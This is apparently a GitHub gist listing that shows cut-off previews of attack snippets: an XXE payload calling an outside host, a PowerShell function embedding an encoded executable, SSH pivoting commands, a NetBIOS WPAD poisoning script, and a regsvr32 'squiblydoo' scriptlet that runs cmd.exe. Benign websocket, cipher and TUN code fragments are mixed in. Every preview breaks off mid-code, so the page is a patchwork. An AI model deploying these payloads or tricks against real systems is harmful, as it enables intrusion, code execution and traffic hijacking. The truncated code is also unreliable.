Skip to content

Instantly share code, notes, and snippets.

@00derp
00derp / XXE_payloads
Created January 24, 2018 05:32 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
function Invoke-Crash
{
$ImputString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABRdKydFRXCzhUVws4VFcLOGEcjzjMVws4YRx3OBBXCzhhHIs6dFcLOHG1RzhgVws4VFcPOnhXCzmhsIs4WFcLOaGwjzhYVws4YRxnOFBXCzhUVVc4UFcLOaGwczhQVws5SaWNoFRXCzgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAu6BLVwAAAAAAAAAA4AADAQsBDAAANgEAAGQCAAAAAAAQWAAAABAAAABQAQAAAEAAABAAAAACAAAFAAEAAAAAAAUAAQAAAAAAANADAAAEAACQFwQAAwAAgQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAfAICAIwAAAAAUAIAGHIBAAAAAAAAAAAAAIADALA+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+PwBAEAAAAAAAAAAAAAAAABQAQAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAENAEAABAAAAA2AQAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA3L0AAABQAQAAvgAAADoBAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAOgxAAAAEAIAABQAAAD4AQAAAAAAAAAAAAAAAABAAADALnJzcmMAAAAYcgEAAFACAAB0AQAADAIAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@00derp
00derp / ssh_tricks
Created January 17, 2017 22:53 — forked from sckalath/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
@00derp
00derp / PythonSimpleWebsocket
Created December 20, 2016 13:22 — forked from rich20bb/PythonSimpleWebsocket
Simple websocket server in Python. Echos back whatever is received. Works with Chome, Firefox 16, IE 10.
import time
import struct
import socket
import hashlib
import base64
import sys
from select import select
import re
import logging
from threading import Thread
def caesar_encrypt(realText, step):
outText = []
cryptText = []
uppercase = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
lowercase = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
for eachLetter in realText:
if eachLetter in uppercase:
index = uppercase.index(eachLetter)
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'socket'
require 'ipaddr'
#
# Poison a system's NetBIOS resolver for the WPAD name from outside NAT (not BadTunnel)
#
# Usage: ruby netbios-brute-nat.rb <evil-wpad-server> <pps>
@00derp
00derp / Backdoor-Minimalist.sct
Created April 22, 2016 14:35
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
import fcntl
import os
import struct
import subprocess
# Some constants used to ioctl the device file. I got them by a simple C
# program.
TUNSETIFF = 0x400454ca
TUNSETOWNER = TUNSETIFF + 2